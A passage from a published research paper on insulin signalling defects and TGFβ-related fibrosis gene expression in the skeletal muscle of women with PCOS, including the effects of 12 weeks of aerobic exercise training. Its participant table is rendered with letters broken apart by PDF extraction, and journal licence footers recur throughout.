cholesterol, low-density lipoprotein cholesterol, triglycerides, insulin, testosterone and HbA1c. Low- density lipoprotein and the homeostatic model insulin resistance assessment (HOMA) were calculated (31). Thigh muscle (vastus lateralis) samples were obtained by percutaneous biopsy under local anaesthesia (29) immediately prior to and 30 min into the insulin clamp. Muscle biopsies were immediately frozen in liquid nitrogen and then stored at −80°C for subsequent analysis. Figure 1 Consort flow diagram detailing the sample size and prior research studies for the secondary analysis reported in the current study. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 349 PB–XX 9:4 Ta b le 1 P ar ti ci p an t ch ar ac te ri st ic s an d t h e im p ac t o f 12 w ee ks o f ae ro b ic e xe rc is e tr ai n in g o n t h e tw o o ve rw ei gh t gr o u p s o f w o m en . Pa ra m et er LC LP O W C O W P O W C Pr e- tr ai n in g O W C Po st -t ra in in g O W P Pr e- tr ai n in g O W P Po st -t ra in in g P ar ti ci p an ts p er g ro u p (n ) 16 16 13 14 8 8 A ge (y ) 28 ± 6 a 26 ± 3 ab 35 ± 4 31 ± 6 35 ± 4 31 ± 6 B M I ( kg /m 2 ) 22 ± 2 ab 23 ± 2 ab 36 ± 5 37 ± 7 37 ± 6 36 ± 5 36 ± 6 36 ± 7 W H R 0. 83 (5 .9 ) 0. 84 (4 .7 ) 0. 84 (1 2. 1) 0. 85 (6 .7 ) D XA B o d y fa t (% ) 27 (2 8) ab 30 (2 8) ab 50 (1 1) 47 (8 ) 50 (1 2) 48 (1 3) 45 (8 ) 45 (1 0) Fa t m as s (k g) 16 .4 ± 5 .0 ab 20 .1 ± 6 .7 ab 48 .3 ± 1 0. 6 46 .3 ± 1 0. 4 48 (3 0) 46 (2 7) e 42 (2 6) 41 (3 0) C T A b d o m in al S C F (c m 2 ) 18 5 ± 74 ab 22 9 ± 74 ab 57 1 ± 15 5 58 2 ± 17 4 52 8 (4 9) 52 5 (5 2) e 52 0 (3 4) 49 8 (3 4) A b d o m in al V F (c m 2 ) 32 ± 2 2a b 35 ± 1 0a b 11 7 ± 31 13 5 ± 58 12 0 (4 7) 12 5 (4 9) 12 3 (6 9) 11 0 (7 7) f G lu co se h o m eo st as is FB G (m m o l/ L) 4. 5 ± 0. 3b c 4. 6 ±0 .4 4. 8 ± 0. 3 5. 0 ± 0. 6 4. 7 (3 .8 ) 4. 8 (6 .4 ) 5. 0 (1 0) 5. 0 (5 .1 ) FP in su lin (p m o l/ L) 5. 0 ± 4. 1a b 4. 5 ± 1. 7 ab 16 .6 ± 6 .0 b 28 .5 ± 1 2. 8 17 (4 6) h 18 (5 5) 27 (5 9) 21 (8 6) e C la m p 3 0 m in p la sm a in su lin (p m o l/ L) 59 .1 ± 7 .5 ab 58 .2 ± 1 2. 4a b 84 .7 ± 2 0 99 .6 ± 3 4 83 (3 4) 77 (2 5) 91 (5 0) 88 (7 3) H O M A -I R 0. 9 (6 5) ab 0. 9 (4 4) ab 3. 3 (4 1) b 5. 8 (6 4) 3. 5 (4 7) h 3. 3 (5 6) 6. 1 (6 3) 4. 5 (9 2) G IR (m g/ m in /m 2 ) 33 2 (2 9) ab c 27 0 (2 6) b 25 0 (2 9) b 13 1 (1 05 ) 24 5 (5 7) h 29 3 (3 6) e 11 7 (1 41 ) 17 0 (7 5) e Li p id p ro fil es C h o le st er o l ( m m o l/ L) 4. 8 ± 0. 6 4. 9 ± 0. 7 4. 8 ± 0. 8 4. 9 ± 1. 3 4. 7 (2 9) 4. 9 (2 3) 4. 5 (3 3) 4. 4 (2 2) Tr ig ly ce ri d es (m m o l/ L) 0. 9 ± 0. 7b 0. 7 ± 0. 3b 1. 2 ± 0. 6b 1. 6 ±1 .0 1. 0 (3 5) 1. 2 (4 2) 1. 2 (6 8) 0. 9 (6 7) e, g LD L/ H D L 1. 65 (3 8) ab 1. 61 (2 9) ab 2. 37 (2 4) 3. 27 (5 4) 2. 4 (3 1) i 2. 5 (4 2) 3. 2 (7 5) 3. 0 (5 1) A n d ro ge n s Te st o st er o n e (p m o l/ L) 1. 67 ± 0 .4 6b 2. 14 ± 0 .8 0 1. 61 ± 0 .7 9b 2. 66 ± 0 .6 3 1. 4 (4 8) h 1. 5 (8 6) 2. 6 (2 7) 2. 5 (5 3) SH B G (m m o l/ L) 78 ± 2 1a b 72 ± 3 3a b 45 ± 3 0 28 ± 2 44 (7 8) i 47 (7 9) 26 (3 2) 29 (3 8) FA I ( % ) 2. 2 (5 2) ab 3. 14 (8 2) b 3. 64 (1 01 )b 9. 47 (5 1) 3. 1 (8 6) h 3. 3 (1 03 ) 10 .1 (3 9) 8. 6 (6 6) Fi tn es s V O 2p ea k (m L/ kg /m in ) 38 .7 (2 2) ab 35 .2 (2 2) ab 24 .9 (1 3) 24 .3 (3 0) 25 .7 (1 2. 5) 30 .3 (1 1. 3) d 25 .3 (2 9. 6) 31 .1 (2 7. 0) d P C O S d ia gn o si s N IH p ar ti ci p an ts (n )j 4 13 8 R o tt er d am p ar ti ci p an ts (n )k 16 14 8 D at a ar e fr o m t h e su b se t o f w o m en in cl u d ed in t h is a n ci lla ry a n al ys is (9 , 2 8) a n d p re se n te d a s m ea n ± s. d . o r w h en d at a w er e lo g tr an sf o rm ed t h ey a re p re se n te d a s a b ac k tr an sf o rm ed m ea n (± s. d . as a C V % ). St at is ti ca l d iff er en ce s ar e re p o rt ed f o r b et w ee n g ro u p s (L C , L P , O W C a n d O W P ) a ft er a d ju st in g fo r ag e m ee ti n g b o th P < 0 .0 5 an d c le ar e ff ec ts a t th e 99 % C I: a s ig n ifi ca n tl y d iff er en t fr o m o ve rw ei gh t co n tr o ls P ≤ 0 .0 5; b si gn ifi ca n tl y d iff er en t fr o m o ve rw ei gh t P C O S P ≤ 0 .0 5; c s ig n ifi ca n tl y d iff er en t fr o m le an P C O S P ≤ 0 .0 5. S ta ti st ic al d iff er en ce s ar e re p o rt ed f o r tr ai n in g su b -g ro u p : d si gn ifi ca n tl y d iff er en t fr o m p re -t ra in in g P ≤ 0 .0 1; e si gn ifi ca n tl y d iff er en t fr o m p re -t ra in in g P ≤ 0 .0 5; f s ig n ifi ca n tl y d iff er en t ch an ge b et w ee n g ro u p s P ≤ 0 .0 1; g tr en d f o r d iff er en ce f ro m p re -t ra in in g P < 0. 1; h si gn ifi ca n tl y d iff er en t fr o m P C O S (u n tr ai n ed v al u es ) P ≤ 0 .0 1; i s ig n ifi ca n tl y d iff er en t fr o m P C O S (u n tr ai n ed v al u es ) P ≤ 0 .0 5; j n u m b er o f p ar ti ci p an ts in t h e gr o u p c o n si d er ed t o m ee t N IH d ia gn o st ic c ri te ri a; k n u m b er o f p ar ti ci p an ts in t h e gr o u p c o n si d er ed t o m ee t R o tt er d am d ia gn o st ic c ri te ri a. B M I, b o d y m as s in d ex ; C T, c o m p u te r to m o gr ap h y; D XA , d u al x -r ay a b so rp ti o m et ry ; F A I, fr ee a n d ro ge n in d ex ; G IR -C la m p , g lu co se in fu si o n r at e; H D L, h ig h -d en si ty li p o p ro te in ; H O M A -I R , h o m eo st as is m o d el o f in su lin r es is ta n ce (3 9) ; L C , l ea n c o n tr o l; LD L, lo w -d en si ty li p o p ro te in ; L P , l ea n P C O S; n /a , n o t ap p lic ab le ; O W C , o ve rw ei gh t co n tr o l; O W P , o ve rw ei gh t P C O S; S C F, s u b cu ta n eo u s fa t; S H B G , st er o id h o rm o n e- b in d in g gl o b u lin ; V F, v is ce ra l f at ; W H R , w ai st -t o -h ip r at io . This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3509:4 Muscle protein extraction and Western blot analyses Equal quantities of protein, extracted as previously reported (32, 33, 34), were resolved by SDS-PAGE (Bio-Rad, Criterion TGX Gels), transferred to a PVDF membranes (Bio-Rad, Turbo-Blot) using optimised protocols, blocked with TBST (10 mM Tris; 10% Tween 20) containing 5% skim milk, washed 4 times for 5 mins in TBST and immunoblotted overnight at 4°C with primary antibodies (32, 33, 34) targeting total and phospho-proteins including glucose transporter 4 (GLUT4), insulin receptor (IR), insulin receptor substrate 1 (IRS-1), protein kinase B/Akt, Akt substrate 160 kDA (AS160), typical and atypical phospho-protein kinase C (PKCδ/θ; PKCλ/ζ), mechanistic target of rapamycin (mTOR), glycogen synthase kinase 3α (GSK) and glyceraldehyde phosphate dehydrogenase (GAPDH) as the loading control (Supplementary Table 1, see section on supplementary materials given at the end of this article). After washing and incubation with horseradish peroxidase-conjugated secondary antibody (Perkin Elmer) in 5% skim milk and TBST, the immune-reactive proteins were detected with enhanced chemiluminescence (Amersham Biosciences) on the Versadoc MP4000 (Bio- Rad) and quantified by densitometry (Quantity-One; Bio- Rad). All phospho-protein data were normalised to their total protein, unless otherwise indicated (Figs 2, 4 and Supplementary Figs 1, 2) to control for loading variability. RNA extraction and TGFβ network/tissue fibrosis gene expression analysis Total RNA was isolated from the muscle (15–20 mg) using TRIzol and cleaned up with RNeasy Total RNA Kit columns (Qiagen). The total RNA content and purity were established by measuring absorbance at 260 and 280 nm (NanoDrop; Eppendorf). Ten micrograms of each RNA sample were then DNAse treated using DNase 1 (Thermo Fisher Scientific) described in detail in (35). Relative gene expression was quantified by real- time PCR using the Qiagen RT2 custom profiler array for fibrosis pathway-related genes. 100 ng of DNAse-treated RNA was used for cDNA, diluted 1 in 10 and amplified for 14 genes plus 2 housekeeping genes. cDNA was generated according to manufacturer’s guidelines with modifications (35) using 40 µL of Superscript RT III (Thermo Fisher Scientific). Custom array primers were designed against the human mRNA sequences for the corresponding genes in the Ref Seq database (Supplementary Table 2). All reactions were performed according to the Sybr- Green™ cycle threshold (Ct) method using a Biorad CFX 384 real-time PCR detection. Thermocycling conditions for the PCR included 10 min at 95°C followed by 40 cycles of 15 s at 95°C and 1 min at 60°C. Melt curve analysis from 72 to 95°C (5 s per °C) was performed to ensure a single defined peak for each amplified product. Comparative Ct calculations for the gene expression were performed by subtracting the mean GAPDH and ACTB Ct values from Ct values of the gene of interest to derive a ΔCt value. The expression of the genes was calculated according to the formula: 2−ΔCt. Statistical analysis All statistical analyses were conducted using mixed modelling procedures (PROC MIXED) in Statistical Analysis System (version 9.4, SAS Institute). Data, unless otherwise stated, were log transformed before analysis to overcome heteroscedastic issues and presented as a back-transformed mean with standard deviation (s.d.) as a coefficient of variation (CV; %). For the cross-sectional study separate models were generated to compare differences in variables between groups including participant characteristics, gene expression, where the fixed effects in the model estimated the main effects of PCOS (PCOS/Control) and obesity (BMI - Lean (<27 kg/m2) and overweight (>27 kg/m2) as per (9)) status as nominal variables and the modifying effect of age a linear numeric variable. To estimate the main effects of PCOS and BMI on the fold change (with an s.d. as expressed CV %) in normalised protein phosphorylation induced by 30 min of insulin infusion the fixed effects were again PCOS and BMI status as nominal variables interacted with baseline phosphorylation levels, age and change plasma insulin concentrations (linear numeric variables). For the exercise training sub- study, a similar approach was adopted and the main effects of PCOS (PCOS/Control) and training status (untrained vs trained) on participant characteristics, gene expression, baseline protein abundance and insulin-induced changes phospho-protein abundance were determined with the fixed effects in the model where PCOS and training status as nominal variables and interacted with the dependent variables baseline value. All models estimated between group differences of variables or changes in variables as a percentage and presented with 99% confidence intervals (99% CI). Pearson correlations (PROC CORR; SAS v9.4) were used explore relations between GIR and a select number of variables. Significance was accepted when P < 0.05. As an a priori decision, we ran a parallel analysis on our mixed This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 351 PB–XX 9:4 model outcomes using a Bayesian method that has no or minimally informed prior or belief about the effects or standard deviations or magnitude-based inferences (10, 36). This method allowed us to make probabilistic assertions about the true magnitudes of effects using the non-clinical version of magnitude-based inference, according to which an effect was deemed unclear if the 99% CI spanned substantial positive and negative values of the smallest worthwhile effect (0.2 times between participant s.d.); all other effects were deemed clear and assigned the magnitude of the analysed effect, along with the chances that the effect was substantial and/or trivial (36). The magnitude-based inference component of our combined statistical approach was used to provide a standardised effect size (<0.2, trivial; 0.2–0.6, small; 0.6–1.2 moderate, 1.2–2 large) and to account for inflation of error arising from the large number comparisons investigated. We only reported effects that met our significance criteria (P < 0.05) and were deemed to have a clear standardised-effect by magnitude-based inference for the 99% CI of the analysed effect. Results All clinical data differentiating the different groups of women from the subset of participants used in this analysis and the beneficial impact of exercise training are detailed in Table 1. Between-group differences for insulin-stimulated phosphorylation signalling protein abundance and gene expression are reported as fold changes with 99% CI that includes the adjustments for the appropriate covariates. Insulin signalling Abundance of key phospho-proteins in the insulin signalling pathway across the distal and proximal components, as well as the insulin signalling pathway regulators were analysed across the four groups of women to identify early insulin signalling defects in skeletal muscle that align with PCOS-specific insulin resistance (Fig. 2 and Supplementary Fig. 1). Overall 30 min of insulin infusion stimulated phosphorylation of the signalling proteins across all groups where Figure 2 Normalised fold change of insulin stimulated (30 min) phosphorylation of key proteins in the insulin signalling pathway and insulin signalling pathway regulators. (A) insulin receptor (IR), (B) insulin receptor substrate 1 serine 307 (IRS1), (C) protein kinase B/Akt serine 473 (Akt), (D) Akt threonine 308, (E) atypical protein kinase B (PKC (ζ/λ)), (F) typical PKC (δ/θ), (G) mechanistic target of rapamysin (mTOR), (H) Akt substrate 160 kDa (AS160), (I) glycogen synthase kinase ser 21/9. Covariate adjusted statistical difference reported as: *significant fold increase with insulin stimulation P < 0.05 (and clear effect at 99%CL), **significant fold increase with insulin stimulation P < 0.01 (and clear effect at 99%CL), Psignificant impact of PCOS P < 0.05 (and clear effect at 99%CL), Osignificant impact of obesity P < 0.05 (and clear effect at 99%CL). Presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)), P < 0.05. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3529:4 IR-tyr1162/1163, Akt-ser473, Akt-thr308, mTOR, AS160-thr642 and GSK-ser21/9 underwent significant/meaningful increases (P < 0.05 and large effects) ranging from 1.6 to 4.4-fold (Fig. 2). Only one signalling protein, mTOR demonstrated altered phosphorylation, after adjustments for covariates, where obesity and PCOS reduced phosphorylation. Specifically, PCOS resulted in a moderate 0.6 fold ((99% CI 0.4–0.8), P = 0.01) reduction of phosho-mTOR compared to non-PCOS women. Similarly, obesity also induced a moderate 0.6 fold ((99% CI 0.4–0.9) P = 0.019) compared to lean women. Taken together these data suggest altered insulin-sensitive metabolic signalling distal to Akt which may impact the translocation of the glucose transporter protein GLUT4 and therefore glucose uptake into muscles. We found no differences in protein expression of GLUT 4 between the groups (data not shown). Gene expression for tissue fibrosis The relative gene expression of COL1A2, COL3A1, DCN, IGF1, LOX, LTBP1, TGFB2 and TGFBR2 was impacted by both obesity and/or PCOS status with small to moderate between-group differences (Fig. 3) suggesting aberrant signalling via the TGFβ ligand signalling network, establishing a pro-fibrotic gene program. Specifically, COL1A2 and 3A1 were 2.14 fold (99% CI: 1.8, 2.4; P = 0.001) and 2.12 fold (99% CI: 1.7, 2.4%; P = 0.005) higher in OWP compared to OWC. The OWC group had higher (1.83 fold; P < 0.05) expression of both COL1A2 and 3A1 compared to LC. The LTBP1 gene expression was highest in the overweight groups, with OWP having significantly higher (0.75 fold, 99% CI: 0.6, 0.9; P = 0.008) expression than LC. For DCN (1.94 fold, 99% CI: 1.5, 2.2; P = 0.005) and LOX (2.44 fold 99% CI: 1.7, 2.7; P = 0.021) the OWP group had higher gene expression than OWC. While DCN in LC was lower (0.66 fold, P = 0.031) and LOX was 2.98 fold higher (P = 0.025) than OWC. The TGFβ signalling-related gene expression was higher in the OWP group where TGFB2 and TGFBR2 expression were 1.8 fold (99% CI: 1.5, 2.0; P = 0.0009) and 1.76 fold (99% CI: 1.4, 2.0, P = 0.004) higher in OWP compared to LC respectively. TGFBR2 gene expression was 1.8 fold higher in OWP vs OWC (P = 0.005). In contrast, IGF1 gene expression was lowest in OWC being 2.5 fold (99% CI: 1.6, 4.1; P = 0.006) compared to LC, with OWC also being lower (0.48 fold 99% CI: 0.3, 0.8; P = 0.026) than OWP. Overall GIR negatively correlated with body composition (BMI; android, gynoid and visceral fat; and DXA-derived fat free mass and appendicular muscle mass) and FAI (Supplementary Table 3). In contrast, GIR was positively correlated with aerobic fitness and SHBG concentrations (Supplementary Table 3). These overall associations were due to the stronger correlations observed in the women with PCOS compared to controls across the BMI categories. GIR was also positively correlated to the fold change in insulin-stimulated (30 min) phospho- mTOR (r2 = 0.43, P = 0.02) in the PCOS group only and negatively correlated to TGFBR2 gene expression overall (r2 = −0.37, P = 0.03). Impact of exercise In the women (with overweight/obesity) who participated in the 12-week treadmill exercise intervention a number of changes in clinical features (Table 1), insulin signalling (Fig. 4 and Supplementary Fig. 2) and TGFβ signalling network gene expression (Fig. 5) were observed. Training- induced differential responses to 30 min of insulin stimulation, where only phospho-Aktser473 and phospho- GSKser219 were impacted differently by the training intervention. OWP demonstrated a small attenuation in phosphorylation of phospho-Aktser473 (0.45 fold 99% CI: 0.3, 0.8; P = 0.019) and phospho-GSKser219 (0.48 fold 99% CI: 03, 0.8; P = 0.027) compared to OWC women, respectively. Surprisingly, very few phospho- proteins demonstrated clear with-in group impacts of training. Specifically, training resulted in a large augmentation of insulin-stimulated phospho-AS160 of 1.82 fold (99% CI: 1.2, 2.7; P = 0.025) from pre- to post-training in OWP. On the other hand, training resulted in a small attenuation of phospho-GSKser219 (0.58 fold 99% CI: 0.4, 07; P = 0.006) from pre- to post-training in OWP group. We also reported small to moderate differential training-induced changes in relative gene expression (Fig. 5) of genes for ECM deposition, COL1A2, COL3A1, DCN and LOX, which only occurred in OWP women. COL1A2 gene expression increased by 1.65 fold (99% CI: 1.2, 2.2; P = 0.02) from pre- to post-training in the OWP women. Similarly exercise training induced COL3A1 and LOX gene expression increases of 1.94 fold (99% CI: 1.1, 3.4; P = 0.05) and 1.95 fold (99% CI: 1.3, 3.0; P = 0.03), respectively. The exercise-induced changes in GIR did not correlate with any fold changes in insulin-induced increases/ decreases in protein phosphorylation nor changes in gene expression (Supplementary Table 4) in any group. However, changes in FAI were negatively correlated with the training-induced changes in GIR (r2 = −0.74; P = 0.04) in women with PCOS, indicating increased insulin sensitivity was associated with a decreased FAI. This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 353 PB–XX 9:4 Figure 3 Relative gene expression of the tissue fibrosis (TGFβ) pathway. Gene expression was normalised to the mean of GAPDH and ACTB (the housekeeping genes) expression. (A) COL1A2, (B) COL3A1, (C) DCN, (D) IGF1, (E) LOX, (F) SMAD2, (G) TGF1I1, (H) LTBP1, (I) TGFB1, (J) TGFB2, (K) TGFB3, (L) TGFBR2. These data are from a subset of women (n = 59) (9). Covariate adjusted statistical difference reported: a- significantly different from overweight control P < 0.05 (and clear effect at 99%CL), b- significantly different from overweight PCOS P < 0.05 (and clear effect at 99%CL). Data are presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). Figure 4 Normalised fold change of insulin stimulated (30 min) phosphorylation of key proteins in the insulin signalling pathway before and after 12 weeks of intensified aerobic exercise training in overweight women with and with PCOS. (A) insulin receptor (IR), (B) insulin receptor substrate 1 serine 307 (IRS1), (C) protein kinase B/Akt serine 473 (Akt), (D) Akt threonine 308, (E) atypical protein kinase B (PKC (ζ/λ)), (F) typical PKC (δ/θ), (G) mechanistic target of rapamysin (mTOR), (H) Akt substrate 160 kDa (AS160), (I) glycogen synthase kinase ser 21/9. These data are from a subset of women (n = 8 PCOS, n = 8 control) from (28, 29). Covariate adjusted statistical difference reported as: *significant fold increase with insulin stimulation P < 0.05 (and clear effect at 99%CL), **significant fold increase with insulin stimulation P < 0.01 (and clear effect at 99%CL), asignificantly different between group training response P < 0.05 (and clear effect at 99%CL), bsignificantly with in group training response P < 0.05 (and clear effect at 99%CL). Presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3549:4 Discussion Taking a novel sampling approach, this study demonstrated dysfunction in insulin signalling after 30 min of insulin infusion during an insulin clamp in women with PCOS across a range of BMIs. This dysfunction was distal to Akt/PKB and associated with end-clamp insulin sensitivity. Specifically, reduced insulin stimulated phospho-mTOR was associated with PCOS and obesity status. A 12-week exercise intervention improved, but did not rescue insulin sensitivity in OWP compared to OWC women and these improvements were accompanied by augmented phospho-AS160 and phospho-mTOR (trend) but attenuated phospho-Akt-ser473 and phosho- GSKser21/9in PCOS. We found genes in the TGFβ regulated tissue fibrosis pathway that encode ECM components (COL1A2, COL3A1), enzymes in the collagen deposition and assembly (LOX, DCN), ligands (TGFB2) and their receptor were elevated in OWP. After the 12-week training intervention COL1A2, COL3A1, DCN and LOX were differentially regulated in the OWP compared to OWC women. Overall women with PCOS, especially the OWP showed a gene expression pattern conducive to greater TGFβ ligand-driven ECM or fibrosis, even after the exercise training intervention. Defects in insulin signalling in skeletal muscle are well documented for insulin-resistant conditions (17), including PCOS (13, 37). Our data significantly expands this work exploring possible defects in both proximal and distal components of this pathway in lean and overweight controls and women with PCOS. In agreement with the literature (13, 17, 37) our data demonstrated an obesity-induced defect in the insulin receptor activation of signalling, due to differential phosphorylation of tyr1162/1163 between the lean and overweight groups with no impact of PCOS status. When obesity (BMI) and prevailing insulin concentrations were accounted for, the obesity-driven differences were negated and the lack of impact of PCOS status remained (Fig. 2), as previously reported (13, 37). Our data allowed us to explore the hypothesis of Diamanti-Kandarakis and Dunaif (13) where there may be a PCOS-specific serine kinase targeting IRS1/2. mTOR could be this kinase (38, 39), however, our in vivo data contrast with this hypothesis as no insulin- stimulated change was detected in any group. These data suggest that signalling defects are more likely distal to the IR and IRS1/2 in skeletal muscle of women with PCOS. A key finding of this study, was that our in vivo data show reduced phosphorylation of mTOR occurred in PCOS-specific manner and implicates this protein Figure 5 Training response of relative gene expression in the tissue fibrosis (TGFβ) pathway for women with and without PCOS after 12 weeks of intensified exercise training. (A) COL1A2, (B) COL3A1, (C) DCN, (D) IGF1, (E) LOX, (F) SMAD2, (G) TGF1I1, (H) LTBP1, (I) TGFB1, (J) TGFB2, (K) TGFB3, (L) TGFBR2. These data are from a subset of women (n = 8 PCOS, n = 8 control) from (28, 29). Presented as mean ± s.d. (data presented as back transformed and the s.d. was derived as a coefficient of variation (%)). Covariate adjusted statistical difference reported: *significant within group training effect P < 0.05 (and clear effect at 99%CL), asignificant difference between OWC and OWP P < 0.05 (and clear effect at 99%CL). This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 355 PB–XX 9:4 complex as a mechanism of insulin resistance in PCOS (Supplementary Table 3). These data differ from a recent study (21) investigating insulin signalling defects in lean hyperandrogenic women with PCOS, where defects in adenosine monophosphate kinase (AMPK) and pyruvate dehydrogenase (PDH) activity explain insulin resistance. This work was not without limitations (e.g. lean women only, no fitness assessments (8)) and did not consider mTOR, the alternate metabolic signalling pathway. mTOR signalling via its complex mTORC1 (mTOR + raptor) is associated with nutrition-regulated anabolic processes in skeletal muscle (40). More recently the mTORC2 (mTOR+rictor) has been linked to insulin resistance in skeletal muscle in vitro and animal models in the presence of reduced phospho-Akt ser473, altered intracellular glucose handling, irrespective of levels of phospho-Akt-thr308 and GLUT4 vesical trafficking (39). The women with PCOS from the exercise training sub- group had improved, but not rescued mTOR signalling responses to insulin, which did not correlate with training-induced changes in GIR (Supplementary Table 4). As we were unable to quantify the different mTOR complexes, due to tissue availability, we could not establish if mTORC2 was associated with this PCOS- specific reduction in insulin signalling and sensitivity. More research is needed to understand the PCOS-specific mTOR downregulation and its role in the intrinsic insulin resistance in skeletal muscle. AS160, GSK3, typical PKC (δ/θ) and atypical PKC (λ/ξ) insulin-stimulated phosphorylation were surprisingly similar between groups but there were trends for obesity to reduce signalling. GLUT4 is considered important in skeletal muscle insulin and exercise stimulated glucose uptake (26) where our data for protein expression of GLUT4 (data not shown) surprisingly found no differences between the four groups of women. While these data align with previous work suggesting comparable levels of GLUT4 between women with and without PCOS (41), our methodology (centrifuged muscle lysate and heating prior to gel separation) may mask/underestimate any true differences and effects. The 12-week exercise intervention clearly impacted the dysfunctional phosphorylation of three signalling proteins. Specifically, phospho-AS160, a key protein in Glut4 vesicle translocation (42), was improved in the OWP women, aligning with other training studies (in males (32)). On the other hand phospho- Akt and –GSK3 (regulation of glycogen synthesis (38)) demonstrated contradictory reductions post-training in the OWP women. This was unexpected, especially the reduced phospho-Akt; however, there is the non-linearity of signalling via Akt (43) and thus limiting its impact on any training induced improvements of GIR in OWP. The training intervention did not induce significant changes in the other signalling proteins, each having a vital role in regulating insulin-stimulated glucose uptake either as downstream substrates of Akt or independently including regulation of Glut4 vesicle translocation (Atypical PKC (λ/ξ) (44)) and integration lipid availability to reduce glucose uptake (typical PKC (δ/θ) (45, 46)). In summary, our data suggest that the reduced early activation of proteins below Akt are linked to PCOS–specific insulin resistance. This is despite the alteration but not normalisation of phosphorylation defects by training. Overall, these data and that of others (9, 10) suggests insulin signalling defects in skeletal muscle account for some insulin resistance, but additional molecular mechanisms are responsible for the PCOS-specific insulin resistance and its synergy with obesity. There is emerging data suggesting that at least TGFβ2 is an exercise induced adipokine that promotes insulin sensitivity (25). However, these data are currently biased to male samples and mainly rodent physiology but they do further support the notion that TGFβ pathways are important for insulin sensitivity and response to exercise. Human data supporting (23, 24) induction of insulin resistance provide a direct role of TGFβ signalling, via the SMAD proteins in skeletal muscle glucose uptake. In the context of the aetiology of PCOS, our new hypothesis (22) of TGFβ ligand mediated excess stromal deposition or fibrosis, may apply beyond the ovary to metabolic tissues like skeletal muscle in women with PCOS, predisposing them to insulin resistance. Dysfunctional TGFβ or TGFβ superfamily ligand signalling may be involved as anti-müllerian hormone (AMH) (47) and TGFβ1 (48) are elevated in women with PCOS. These ligands act via their respective receptors to activate the SMAD signalling proteins that are not only negative regulators of Akt (49) and mTOR (24), but are key signals in ECM deposition. Thus, this pathway is a plausible contributor to dysfunctional insulin signalling and reduced sensitivity in PCOS. Our gene expression data of elevated collagen, ECM deposition enzymes and TGFβ2R gene expression (pro-fibrotic gene profile), elevated ligands (AMH (47) and TGFβ1 (48)) and our previously reported high tissue density (elevated Hounsfield units) in thigh skeletal muscle from CT analysis (29), support the notion that TGFβ ligand signalling and tissue fibrosis may be involved in PCOS-specific skeletal muscle insulin resistance (8). This may occur not only via SMAD protein signalling interfering with Akt This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com © 2020 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:11PM via free access https://creativecommons.org/licenses/by-nc/4.0/ https://creativecommons.org/licenses/by-nc/4.0/ https://doi.org/10.1530/EC-19-0551 https://ec.bioscientifica.com N K Stepto, D Hiam et al. Insulin resistance in PCOS skeletal muscle 3569:4 and/or mTOR signalling, but also via increased ECM possibly limiting insulin and glucose movement across the interstitial space. Interestingly, exercise training had no effect on this network of genes except LOX, COL1A2 and 3A1 where expression was augmented. This provides a possible mechanism for resistance to insulin sensitising therapies in PCOS, which aligns with other research (23) and warrants further investigation. Therefore, our data support our hypothesis (22) and allows us to expand our understanding of 